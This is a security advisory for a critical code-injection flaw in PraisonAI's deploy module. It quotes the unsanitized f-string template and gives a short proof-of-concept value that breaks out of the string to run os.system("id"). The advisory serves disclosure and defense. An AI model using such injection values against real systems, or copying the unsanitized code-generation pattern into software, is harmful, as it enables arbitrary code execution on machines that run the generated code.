GHSA-g6j7-pffp-8whgCriticalCVSS 9.1

PraisonAI: Code Injection via f-string Interpolation in Deploy API Server Generation

Published
October 7, 2026
Last Modified
October 7, 2026

🔗 CVE IDs covered (1)

📋 Description

Summary

The deploy/api.py module generates Python server code by directly interpolating the agents_file parameter into an f-string that is then written to a file and executed via subprocess.Popen(). An attacker who controls the agents_file value (via CLI argument, configuration, or upstream API) can inject arbitrary Python code.

Details

src/praisonai/praisonai/deploy/api.py (line 80):

code = f'''...
    praisonai = PraisonAI(agent_file="{agents_file}")
...
    "agent_file": "{agents_file}"
...'''

The generated code is then executed (line 190):

subprocess.Popen(['python', server_file])

agents_file is never sanitized or validated. A malicious value breaks out of the string context:

agents_file = '"); import os; os.system("id"); #'
# Generated code becomes:
# praisonai = PraisonAI(agent_file=""); import os; os.system("id"); #")

The same pattern exists in deploy/docker.py (line 33) for Dockerfile generation.

PoC

# The injection:
agents_file = '"); import os; os.system("id"); #'

# What the generated code looks like:
template = f'praisonai = PraisonAI(agent_file="{agents_file}")'
print(template)
# Output: praisonai = PraisonAI(agent_file=""); import os; os.system("id"); #")

Impact

  • Arbitrary code execution on the machine running the deploy command
  • Supply chain risk if agents_file comes from a configuration file or CI/CD pipeline

🎯 Affected products1

  • pip/PraisonAI:<= 4.6.77

🔗 References (2)